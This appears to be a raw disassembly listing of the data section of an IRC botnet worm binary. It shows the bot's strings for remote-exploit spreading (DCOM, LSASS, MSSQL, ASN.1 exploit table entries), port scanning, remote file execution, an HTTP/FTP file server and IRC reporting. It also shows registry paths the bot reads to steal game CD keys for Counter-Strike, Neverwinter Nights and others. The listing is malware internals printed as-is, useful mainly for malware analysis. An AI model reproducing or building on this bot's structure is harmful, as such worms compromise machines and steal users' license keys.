db 'Server: myBot',0Dh,0Ah
db 'Cache-Control: no-cache,no-store,max-age=0',0Dh,0Ah
db 'pragma: no-cache',0Dh,0Ah
db 'Content-Type: %s',0Dh,0Ah
db 'Content-Length: %i',0Dh,0Ah
db 'Accept-Ranges: bytes',0Dh,0Ah
db 'Date: %s %s GMT',0Dh,0Ah
db 'Last-Modified: %s %s GMT',0Dh,0Ah
db 'Expires: %s %s GMT',0Dh,0Ah
db 'Connection: close',0Dh,0Ah
db 0Dh,0Ah,0
align 10h
aHttp1_0200OkSe db 'HTTP/1.0 200 OK',0Dh,0Ah ; DATA XREF: sub_405ECC+D3�o
db 'Server: myBot',0Dh,0Ah
db 'Cache-Control: no-cache,no-store,max-age=0',0Dh,0Ah
db 'pragma: no-cache',0Dh,0Ah
db 'Content-Type: %s',0Dh,0Ah
db 'Accept-Ranges: bytes',0Dh,0Ah
db 'Date: %s %s GMT',0Dh,0Ah
db 'Last-Modified: %s %s GMT',0Dh,0Ah
db 'Expires: %s %s GMT',0Dh,0Ah
db 'Connection: close',0Dh,0Ah
db 0Dh,0Ah,0
align 4
aHhMmSs db 'HH:mm:ss',0 ; DATA XREF: sub_405ECC+97�o
; sub_40A9D8+1AE�o
align 4
aDddDdMmmYyyy db 'ddd, dd MMM yyyy',0 ; DATA XREF: sub_405ECC+83�o
align 4
aApplicationOct db 'application/octet-stream',0 ; DATA XREF: sub_405ECC:loc_405F37�o
align 4
aTextHtml db 'text/html',0 ; DATA XREF: sub_405ECC+64�o
align 8
unk_426C58 db 2 ; DATA XREF: sub_406048+27C�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 68h ; h
db 2 dup(74h), 70h
db 64h ; d
db 2Eh, 6Dh, 1Fh
db 64h ; d
db 1Fh, 6Ch, 20h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ; »
db 2, 2 dup(20h)
aFailedToStartW db 'Failed to start worker thread, error: <%d>.',0
align 8
unk_426CA8 db 2 ; DATA XREF: sub_406048+20A�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 68h ; h
db 2 dup(74h), 70h
db 64h ; d
db 2Eh, 6Dh, 1Fh
db 64h ; d
db 1Fh, 6Ch, 20h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ; »
db 2, 2 dup(20h)
aWorkerThreadOf db 'Worker thread of server thread: %d.',0
asc_426CEC: ; DATA XREF: sub_406048+156�o
; .text:0042E290�o
unicode 0, <*>,0
asc_426CF0: ; DATA XREF: sub_406048+FA�o
; sub_4062F7+29�o ...
dw 0Ah
unicode 0, <>,0
aSS_2 db '%s%s',0 ; DATA XREF: sub_406048+E9�o
; sub_4062F7+4CF�o ...
align 4
aS_1 db '%s',0 ; DATA XREF: sub_406048+39�o
; sub_40A53E+4C�o ...
align 10h
aS_2 db '\%s',0 ; DATA XREF: sub_406048+2F�o
aFoundIFilesAnd db 'Found: %i Files and %i Directories',0Dh,0Ah,0
; DATA XREF: sub_4062F7+64D�o
align 10h
aTrTdColspan3_0 db '<TR>',0Dh,0Ah ; DATA XREF: sub_4062F7+638�o
db '<TD COLSPAN="3"><HR></TD>',0Dh,0Ah
db '</TR>',0Dh,0Ah
db '</TABLE>',0Dh,0Ah
db '</BODY>',0Dh,0Ah
db '</HTML>',0Dh,0Ah,0
align 4
aPrivmsgSFoundS db 'PRIVMSG %s :Found %s Files and %s Directories',0Ah,0
; DATA XREF: sub_4062F7+61D�o
align 4
a31s21sIBytes db '%-31s %-21s (%i bytes)',0Dh,0Ah,0 ; DATA XREF: sub_4062F7+58E�o
align 8
aTdTdWidthDCo_0 db '</TD>',0Dh,0Ah ; DATA XREF: sub_4062F7+566�o
db '<TD WIDTH="%d"><CODE>%s</CODE></TD>',0Dh,0Ah
db '<TD WIDTH="%d" ALIGN="right"><CODE>%dk</CODE></TD>',0Dh,0Ah
db '</TR>',0Dh,0Ah,0
aCodeSCodeA_0 db '"><CODE>%s</CODE></A>',0 ; DATA XREF: sub_4062F7:loc_40681A�o
align 4
aCode_30sGtCode db '"><CODE>%.30s></CODE></A>',0 ; DATA XREF: sub_4062F7+51C�o
align 4
aPrivmsgS31s2_0 db 'PRIVMSG %s :%-31s %-21s (%s bytes)',0Ah,0 ; DATA XREF: sub_4062F7+476�o
align 10h
a31s21s db '%-31s %-21s',0Dh,0Ah,0 ; DATA XREF: sub_4062F7+439�o
align 10h
aTdTdWidthDCode db '</TD>',0Dh,0Ah ; DATA XREF: sub_4062F7+406�o
db '<TD WIDTH="%d"><CODE>%s</CODE></TD>',0Dh,0Ah
db '<TD WIDTH="%d" ALIGN="right"><CODE>-</CODE></TD>',0Dh,0Ah
db '</TR>',0Dh,0Ah,0
align 4
aCodeSCodeA db '"><CODE>%s/</CODE></A>',0 ; DATA XREF: sub_4062F7:loc_4066C4�o
align 10h
aCode_29sGtCode db '"><CODE>%.29s>/</CODE></A>',0 ; DATA XREF: sub_4062F7+3C6�o
align 10h
aSS_0 db '%s%s/',0 ; DATA XREF: sub_4062F7+379�o
align 4
aTrTdWidthDAHre db '<TR>',0Dh,0Ah ; DATA XREF: sub_4062F7+335�o
; sub_4062F7+48B�o
db '<TD WIDTH="%d"><A HREF="',0
align 4
aPrivmsgS31s21s db 'PRIVMSG %s :%-31s %-21s',0Ah,0 ; DATA XREF: sub_4062F7+308�o
align 4
aS_0 db '<%s>',0 ; DATA XREF: sub_4062F7+2DE�o
; sub_4062F7+418�o
align 4
a2_2d2_2d4d2_2d db '%2.2d/%2.2d/%4d %2.2d:%2.2d %s',0 ; DATA XREF: sub_4062F7+2B4�o
aAm db 'AM',0 ; DATA XREF: sub_4062F7+293�o
align 10h
aPm db 'PM',0 ; DATA XREF: sub_4062F7+284�o
align 4
a__1: ; DATA XREF: sub_4062F7+24C�o
unicode 0, <.>,0
a__ db '..',0 ; DATA XREF: sub_4062F7+231�o
align 10h
aTrTdColspan3AH db '<TR>',0Dh,0Ah ; DATA XREF: sub_4062F7+1BF�o
db '<TD COLSPAN="3"><A HREF="%s"><CODE>Parent Directory</CODE></A></T'
db 'D>',0Dh,0Ah
db '</TR>',0Dh,0Ah,0
align 4
aSearchingForS db 'Searching for: %s',0Dh,0Ah,0 ; DATA XREF: sub_4062F7+146�o
aTrTdColspan3Hr db '<TR>',0Dh,0Ah ; DATA XREF: sub_4062F7+12A�o
db '<TD COLSPAN="3"><HR></TD>',0Dh,0Ah
db '</TR>',0Dh,0Ah,0
align 8
aTrTdWidthDCode db '<TR>',0Dh,0Ah ; DATA XREF: sub_4062F7+F6�o
db '<TD WIDTH="%d"><CODE>Name</CODE></TD>',0Dh,0Ah
db '<TD WIDTH="%d"><CODE>Last Modified</CODE></TD>',0Dh,0Ah
db '<TD WIDTH="%d" ALIGN="right"><CODE>Size</CODE></TD>',0Dh,0Ah
db '</TR>',0Dh,0Ah,0
align 4
aH1IndexOfSH1Ta db '<H1>Index of %s</H1>',0Dh,0Ah ; DATA XREF: sub_4062F7+AC�o
db '<TABLE BORDER="0">',0Dh,0Ah,0
align 10h
aHtmlHeadTitleI db '<HTML>',0Dh,0Ah ; DATA XREF: sub_4062F7+77�o
db '<HEAD>',0Dh,0Ah
db '<TITLE>Index of %s</TITLE>',0Dh,0Ah
db '</HEAD>',0Dh,0Ah
db '<BODY>',0Dh,0Ah,0
align 10h
aPrivmsgSSearch db 'PRIVMSG %s :Searching for: %s',0Dh,0Ah,0 ; DATA XREF: sub_4062F7+4B�o
aSSHttp1_1Refer db '%s %s HTTP/1.1',0Ah ; DATA XREF: sub_406A63+8F�o
db 'Referer: %s',0Ah
db 'Host: %s',0Ah
db 'Connection: close',0Ah
db 0Ah,0
dword_4271B8 dd 4000500h, 7868746Bh, 2 dup(0)dword_4271C8 dd 28026502h, 62302E31h, 20282029h, 2E707466h, 1F641F6Dh
; DATA XREF: sub_406B84+479�o
dd 2029206Ch, 2BBBB02h
aFileSentToSExe db ' File sent to %s, executing %s on remote machine.',0
align 4
unk_427218 db 2 ; DATA XREF: sub_406B84+3B6�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 74h ; t
db 66h, 74h, 70h
db 2Eh ; .
db 6Dh, 1Fh, 64h
db 1Fh
db 6Ch, 20h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFileNotFoundOn db ' File not found on %s, (%s).',0
align 4
dword_427254 dd 1000500h, 656C6946h, 746F4E20h, 756F4620h, 646Eh
; DATA XREF: sub_406B84+399�o
unk_427268 db 2 ; DATA XREF: sub_406B84+33E�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 74h ; t
db 66h, 74h, 70h
db 64h ; d
db 2Eh, 6Dh, 1Fh
db 64h ; d
db 1Fh, 6Ch, 20h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ; »
db 2, 2 dup(20h)
aFileSentToSE_0 db 'File sent to %s, executing %s on remote machine.',0
align 10h
unk_4272C0 db 2 ; DATA XREF: sub_406B84+15A�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 74h ; t
db 66h, 74h, 70h
db 64h ; d
db 2Eh, 6Dh, 1Fh
db 64h ; d
db 1Fh, 6Ch, 20h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ; »
db 2, 2 dup(20h)
aFailedToOpenFi db 'Failed to open file: %s (possible virus scan!)',0
align 10h
unk_427310 db 2 ; DATA XREF: sub_406B84+6A�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 74h ; t
db 66h, 74h, 70h
db 64h ; d
db 2Eh, 6Dh, 1Fh
db 64h ; d
db 1Fh, 6Ch, 20h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ; »
db 2, 2 dup(20h)
aErrorSocketF_2 db 'Error: socket() failed, returned: <%d>.',0
aOctet db 'octet',0 ; DATA XREF: sub_406B84+F�o
align 10h
aDcom135_0 db 'dcom135',0 ; DATA XREF: sub_4076CB+155�o
db 2 dup(0)
aDcom135 db 'Dcom135',0 ; DATA XREF: .text:00404A94�o
align 4
dd 5 dup(0)
dword_427388 dd 87h ; sub_40CD3A+2EEA�r ...
off_42738C dd offset sub_4033B6 ; DATA XREF: sub_4076CB+1D7�r
dword_427390 dd 0 ; sub_4033B6+2F0�r ...
dword_427394 dd 1 dword_427398 dd 0 aDcom445 db 'dcom445',0
dd 63440000h, 34346D6Fh, 35h, 5 dup(0)
dd 1BDh, 4033B6h, 0
dd 1, 0
aDcom1025 db 'dcom1025',0
align 2
aDcom1025_0 db 'Dcom1025',0
align 4
dd 5 dup(0)
dd 401h, 4033B6h, 0
dd 1, 0
aDcass db 'dcass',0
align 4
dd 63640000h, 737361h, 6 dup(0)
dd 1BDh, 402F74h, 0
dd 2 dup(1), 7361736Ch, 35343473h, 736C0000h, 34737361h
dd 3534h, 5 dup(0)
dd 1BDh, 403C74h, 0
dd 2 dup(1), 7361736Ch, 35333173h, 736C0000h, 31737361h
dd 3533h, 5 dup(0)
dd 87h, 403C74h, 0
dd 2 dup(1), 7361736Ch, 39333173h, 736C0000h, 31737361h
dd 3933h, 5 dup(0)
dd 8Bh, 403C74h, 0
dd 2 dup(1), 61736C63h, 7373h, 6C630000h, 73736173h, 6 dup(0)
dd 1BDh, 402DD1h, 0
dd 2 dup(1), 6C31736Ch, 73h, 736C0000h, 736C31h, 6 dup(0)
dd 1BDh, 403E21h, 0
dd 2 dup(1), 7173736Dh, 6Ch, 736D0000h, 6C7173h, 6 dup(0)
dd 599h, 404EC7h, 0
dd 2 dup(1), 316E7361h, 6E626D73h, 736D0074h, 737361h
dd 6 dup(0)
dd 599h, 4050FFh, 0
dd 2 dup(1), 6C616572h, 74736163h, 65520000h, 61636C61h
dd 7473h, 5 dup(0)
dd 22Ah, 40528Fh, 0
dd 1, 0
aAsn1http db 'asn1http',0
align 2
aAsn1http_0 db 'asn1http',0
align 4
dd 5 dup(0)
dd 50h, 4048D6h, 0
dd 2 dup(1), 316E7361h, 626D73h, 73610000h, 6D73316Eh
dd 62h, 5 dup(0)
dd 1BDh, 4048D6h, 0
dd 2 dup(1), 7361736Dh, 73h, 73610000h, 6D73316Eh, 746E62h
dd 5 dup(0)
dd 8Bh, 4048D6h, 0
dd 2 dup(1), 316E7361h, 6E626D73h
db 74h, 0
byte_4276EE db 1 ; DATA XREF: sub_40CD3A:loc_4117DE�r
; sub_40CD3A+4AAE�o
aMsass db 'msass',0
align 4
dd 100h, 3 dup(0)
aTotalDInS_ db ' Total: %d in %s.',0 ; DATA XREF: sub_407075+81�o
align 4
aSD db ' %s: %d,',0 ; DATA XREF: sub_407075+42�o
align 4
unk_427728 db 2 ; DATA XREF: sub_407075+11�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 70h ; p
db 6Fh, 72h, 74h
db 73h ; s
db 63h, 61h, 6Eh
db 2Eh ; .
db 6Dh, 1Fh, 64h
db 1Fh
db 6Ch, 20h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aExploitStatist db ' Exploit Statistics:',0
align 10h
unk_427760 db 2 ; DATA XREF: sub_40713F+42�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 70h ; p
db 6Fh, 72h, 74h
db 73h ; s
db 63h, 61h, 6Eh
db 2Eh ; .
db 6Dh, 1Fh, 64h
db 1Fh
db 6Ch, 20h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aScanNotActive_ db ' Scan not active.',0
unk_427794 db 2 ; DATA XREF: sub_40713F+2C�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 70h ; p
db 6Fh, 72h, 74h
db 73h ; s
db 63h, 61h, 6Eh
db 2Eh ; .
db 6Dh, 1Fh, 64h
db 1Fh
db 6Ch, 20h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aCurrentIpS_ db ' Current IP: %s.',0
align 4
unk_4277C8 db 2 ; DATA XREF: sub_4071B6+35D�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 68h ; h
db 2 dup(74h), 70h
db 64h ; d
db 2Eh, 6Dh, 1Fh
db 64h ; d
db 1Fh, 6Ch, 20h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ; »
db 2, 2 dup(20h)
aFailedToStartS db 'Failed to start server, error: <%d>.',0
align 10h
unk_427810 db 2 ; DATA XREF: sub_4071B6+307�o
; sub_40CD3A+4FD8�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 68h ; h
db 2 dup(74h), 70h
db 64h ; d
db 2Eh, 6Dh, 1Fh
db 64h ; d
db 1Fh, 6Ch, 20h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ; »
db 2, 2 dup(20h)
aServerListenin db 'Server listening on IP: %s:%d, Directory: %s\.',0
align 10h
dword_427860 dd 28026502h, 62302E31h, 20282029h, 2E707466h, 1F641F6Dh
; DATA XREF: sub_4071B6+252�o
dd 2029206Ch, 2BBBB02h
aFailedToStar_0 db ' Failed to start server, error: <%d>.',0
align 8
dword_4278A8 dd 28026502h, 62302E31h, 20282029h, 2E707466h, 1F641F6Dh
; DATA XREF: sub_4071B6+1FB�o
dd 2029206Ch, 2BBBB02h
aServerStartedO db ' Server started on Port: %d, File: %s, Request: %s.',0
align 10h
unk_427900 db 2 ; DATA XREF: sub_4071B6+138�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 74h ; t
db 66h, 74h, 70h
db 64h ; d
db 2Eh, 6Dh, 1Fh
db 64h ; d
db 1Fh, 6Ch, 20h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ; »
db 2, 2 dup(20h)
aFailedToStar_1 db 'Failed to start server, error: <%d>.',0
align 4
unk_427948 db 2 ; DATA XREF: sub_4071B6+D8�o
; sub_40CD3A+4E63�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 74h ; t
db 66h, 74h, 70h
db 64h ; d
db 2Eh, 6Dh, 1Fh
db 64h ; d
db 1Fh, 6Ch, 20h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ; »
db 2, 2 dup(20h)
aServerStarte_0 db 'Server started on Port: %d, File: %s, Request: %s.',0
align 4
aD_D_D_D db '%d.%d.%d.%d',0 ; DATA XREF: sub_407592+38�o
; sub_40A08A+46�o
unk_4279A8 db 2 ; DATA XREF: sub_4076CB+DC�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 70h ; p
db 6Fh, 72h, 74h
db 73h ; s
db 63h, 61h, 6Eh
db 2Eh ; .
db 6Dh, 1Fh, 64h
db 1Fh
db 6Ch, 20h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aIpSPortDIsOpen db ' IP: %s, Port %d is open.',0
align 8
unk_4279E8 db 2 ; DATA XREF: sub_4076CB+84�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 70h ; p
db 6Fh, 72h, 74h
db 73h ; s
db 63h, 61h, 6Eh
db 2Eh ; .
db 6Dh, 1Fh, 64h
db 1Fh
db 6Ch, 20h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aIpSDScanThread db ' IP: %s:%d, Scan thread: %d, Sub-thread: %d.',0
align 4
unk_427A38 db 2 ; DATA XREF: sub_4078DF+1E0�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 70h ; p
db 6Fh, 72h, 74h
db 73h ; s
db 63h, 61h, 6Eh
db 2Eh ; .
db 6Dh, 1Fh, 64h
db 1Fh
db 6Ch, 20h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFinishedAtSDAf db ' Finished at %s:%d after %d minute(s) of scanning.',0
align 10h
unk_427A90 db 2 ; DATA XREF: sub_4078DF+168�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 70h ; p
db 6Fh, 72h, 74h
db 73h ; s
db 63h, 61h, 6Eh
db 2Eh ; .
db 6Dh, 1Fh, 64h
db 1Fh
db 6Ch, 20h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFailedToStar_2 db ' Failed to start worker thread, error: <%d>.',0
align 10h
unk_427AE0 db 2 ; DATA XREF: sub_4078DF+103�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 70h ; p
db 6Fh, 72h, 74h
db 73h ; s
db 63h, 61h, 6Eh
db 2Eh ; .
db 6Dh, 1Fh, 64h
db 1Fh
db 6Ch, 20h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aSDScanThreadDS db ' %s:%d, Scan thread: %d, Sub-thread: %d.',0
align 10h
unk_427B30 db 2 ; DATA XREF: sub_4078DF+87�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 70h ; p
db 6Fh, 72h, 74h
db 73h ; s
db 63h, 61h, 6Eh
db 2Eh ; .
db 6Dh, 1Fh, 64h
db 1Fh
db 6Ch, 20h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFailedToInitia db ' Failed to initialize critical section.',0
align 10h
unk_427B80 db 2 ; DATA XREF: sub_407B36+143�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 72h ; r
db 65h, 64h, 69h
db 72h ; r
db 65h, 63h, 74h
db 2Eh ; .
db 6Dh, 1Fh, 64h
db 1Fh
db 6Ch, 20h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFailedToStartC db ' Failed to start client thread, error: <%d>.',0
align 10h
unk_427BD0 db 2 ; DATA XREF: sub_407B36+E1�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 72h ; r
db 65h, 64h, 69h
db 72h ; r
db 65h, 63h, 74h
db 2Eh ; .
db 6Dh, 1Fh, 64h
db 1Fh
db 6Ch, 20h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aClientConnecti db ' Client connection from IP: %s:%d, Server thread: %d.',0
unk_427C28 db 2 ; DATA XREF: sub_407CBD+157�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 72h ; r
db 65h, 64h, 69h
db 72h ; r
db 65h, 63h, 74h
db 2Eh ; .
db 6Dh, 1Fh, 64h
db 1Fh
db 6Ch, 20h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFailedToStar_3 db ' Failed to start connection thread, error: <%d>.',0
align 10h
unk_427C80 db 2 ; DATA XREF: sub_407CBD+E1�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 72h ; r
db 65h, 64h, 69h
db 72h ; r
db 65h, 63h, 74h
db 2Eh ; .
db 6Dh, 1Fh, 64h
db 1Fh
db 6Ch, 20h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aClientConnec_0 db ' Client connection to IP: %s:%d, Server thread: %d.',0
align 4
unk_427CD8 db 2 ; DATA XREF: sub_407F42+1B1�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 73h ; s
db 6Fh, 63h, 6Bh
db 73h ; s
db 2Eh, 6Dh, 1Fh
db 64h ; d
db 1Fh, 6Ch, 20h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ; »
db 2, 2 dup(20h)
aFailedToStar_4 db 'Failed to start server on Port %d.',0
align 10h
unk_427D20 db 2 ; DATA XREF: sub_407F42+17C�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 73h ; s
db 6Fh, 63h, 6Bh
db 73h ; s
db 2Eh, 6Dh, 1Fh
db 64h ; d
db 1Fh, 6Ch, 20h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ; »
db 2, 2 dup(20h)
aFailedToStar_5 db 'Failed to start client thread, error: <%d>.',0
align 10h
unk_427D70 db 2 ; DATA XREF: sub_407F42+114�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 73h ; s
db 6Fh, 63h, 6Bh
db 73h ; s
db 2Eh, 6Dh, 1Fh
db 64h ; d
db 1Fh, 6Ch, 20h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ; »
db 2, 2 dup(20h)
aClientConnec_1 db 'Client connection from IP: %s:%d, Server thread: %d.',0
align 4
unk_427DC8 db 2 ; DATA XREF: sub_407F42+A8�o
; sub_40CD3A+584D�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 73h ; s
db 6Fh, 63h, 6Bh
db 73h ; s
db 2Eh, 6Dh, 1Fh
db 64h ; d
db 1Fh, 6Ch, 20h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ; »
db 2, 2 dup(20h)
aServerStarte_1 db 'Server started on: %s:%d.',0
align 8
unk_427E08 db 2 ; DATA XREF: sub_408146+1F9�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 73h ; s
db 6Fh, 63h, 6Bh
db 73h ; s
db 2Eh, 6Dh, 1Fh
db 64h ; d
db 1Fh, 6Ch, 20h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ; »
db 2, 2 dup(20h)
aErrorFailedToC db 'Error: Failed to connect to target, returned: <%d>.',0
align 10h
unk_427E60 db 2 ; DATA XREF: sub_408146+18A�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 73h ; s
db 6Fh, 63h, 6Bh
db 73h ; s
db 2Eh, 6Dh, 1Fh
db 64h ; d
db 1Fh, 6Ch, 20h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ; »
db 2, 2 dup(20h)
aErrorFailedToO db 'Error: Failed to open socket(), returned: <%d>.',0
unk_427EB0 db 2 ; DATA XREF: sub_408146+F2�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 73h ; s
db 6Fh, 63h, 6Bh
db 73h ; s
db 2Eh, 6Dh, 1Fh
db 64h ; d
db 1Fh, 6Ch, 20h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ; »
db 2, 2 dup(20h)
aAuthentication db 'Authentication failed. Remote userid: %s != %s.',0
dd 80000001h
off_427F04 dd offset aSoftwareValveC ; DATA XREF: sub_408503+C�r
; sub_408503+21�o
; "Software\\Valve\\CounterStrike\\Settings"
dd offset aCdkey ; "CDKey"
dd offset aCounterStrikeR ; "Counter-Strike (Retail)"
dword_427F10 dd 2 dup(0) dd 80000001h, 4290A8h, 42909Ch, 42908Ch, 2 dup(0)
dd 80000001h, 42906Ch, 429068h, 429054h, 2 dup(0)
dd 80000001h, 429030h, 429068h, 429024h, 2 dup(0)
dd 80000001h, 429000h, 428FF8h, 428FE4h, 2 dup(0)
dd 80000001h, 428FD0h, 428FC0h, 428FA4h, 2 dup(0)
dd 80000001h, 428F60h, 4290E8h, 428F4Ch, 2 dup(0)
dd 80000002h, 428F20h, 428F14h, 428EF4h, 2 dup(0)
dd 80000002h, 428EC0h, 4290E8h, 428EA8h, 2 dup(0)
dd 80000002h, 428E74h, 4290E8h, 428E5Ch, 2 dup(0)
dd 80000002h, 428E44h, 4290E8h, 428E2Ch, 2 dup(0)
dd 80000002h, 428DF0h, 43B658h, 428DE0h, 2 dup(0)
dd 80000002h, 428DA8h, 43B658h, 428D94h, 2 dup(0)
dd 80000002h, 428D48h, 43B658h, 428D28h, 2 dup(0)
dd 80000002h, 428CD8h, 43B658h, 428CA8h, 2 dup(0)
dd 80000002h, 428C6Ch, 43B658h, 428C58h, 2 dup(0)
dd 80000002h, 428C20h, 43B658h, 428C10h, 2 dup(0)
dd 80000002h, 428BC0h, 43B658h, 428B90h, 2 dup(0)
dd 80000002h, 428B50h, 43B658h, 428B30h, 2 dup(0)
dd 80000002h, 428B00h, 43B658h, 428AE0h, 2 dup(0)
dd 80000002h, 428AA4h, 43B658h, 428A90h, 2 dup(0)
dd 80000002h, 428A48h, 43B658h, 428A24h, 2 dup(0)
dd 80000002h, 4289D0h, 43B658h, 4289A0h, 2 dup(0)
dd 80000002h, 428950h, 43B658h, 428924h, 2 dup(0)
dd 80000002h, 4288E4h, 4288DCh, 4288BCh, 2 dup(0)
dd 80000002h, 428878h, 43B658h, 42885Ch, 2 dup(0)
dd 80000002h, 428810h, 43B658h, 4287ECh, 2 dup(0)
dd 80000002h, 4287B8h, 43B658h, 4287ACh, 2 dup(0)
dd 80000002h, 428778h, 43B658h, 42876Ch, 2 dup(0)
dd 80000002h, 428738h, 43B658h, 42872Ch, 2 dup(0)
dd 80000002h, 4286F8h, 43B658h, 4286ECh, 2 dup(0)
dd 80000002h, 4286B0h, 43B658h, 42869Ch, 2 dup(0)
dd 80000002h, 428660h, 43B658h, 42864Ch, 2 dup(0)
dd 80000002h, 42861Ch, 4290E8h, 428600h, 2 dup(0)
dd 80000002h, 4285E0h, 4285D8h, 4285B4h, 2 dup(0)
dd 80000002h, 428598h, 4285D8h, 428578h, 2 dup(0)
dd 80000002h, 428558h, 4285D8h, 428534h, 2 dup(0)
dd 80000002h, 42851Ch, 4285D8h, 428518h, 2 dup(0)
dd 80000002h, 4284FCh, 4284ECh, 4284E4h, 2 dup(0)
dd 80000002h, 4284B0h, 4284ACh, 428494h, 2 dup(0)
dd 80000002h, 428458h, 42844Ch, 428424h, 428414h, 428400h
dd 80000002h, 4283DCh, 4283D0h, 4283BCh, 4283ACh, 4283A4h
dd 80000002h, 4283DCh, 4283D0h, 428378h, 4283ACh, 428370h
dd 80000002h, 4283DCh, 4283D0h, 428340h, 4283ACh, 428338h
dd 6 dup(0)
dd 3379654Bh, 3Dh, 6576654Eh, 6E697772h, 20726574h, 6867694Eh
dd 28207374h, 64726F48h, 6F207365h, 68742066h, 6E552065h
dd 64726564h, 296B7261h, 0
dd 3279654Bh, 3Dh, 6576654Eh, 6E697772h, 20726574h, 6867694Eh
dd 28207374h, 64616853h, 2073776Fh, 5520666Fh, 6572646Eh
dd 6469746Eh, 2965h, 3179654Bh, 3Dh, 636E776Eh, 79656B64h
dd 696E692Eh, 0
aNeverwinterNig db 'Neverwinter Nights',0
align 10h
aLocation db 'Location',0
align 4
aSoftwareBiowar db 'Software\BioWare\NWN\Neverwinter',0
align 10h
aMtkwftmkemfew3 db 'mtkwftmkemfew3p3b7',0
align 4
aBaseMpSof2key db 'base\mp\sof2key',0
aSoldierOfFortu db 'Soldier of Fortune II - Double Helix',0
align 4
aInstallpath db 'InstallPath',0
db 53h
aOftwareActivis db 'oftware\Activision\Soldier of Fortune II - Double Helix',0
align 4
aHiddenDangerou db 'Hidden & Dangerous 2',0
align 4
aKey db 'key',0 ; DATA XREF: .text:0042D28C�o
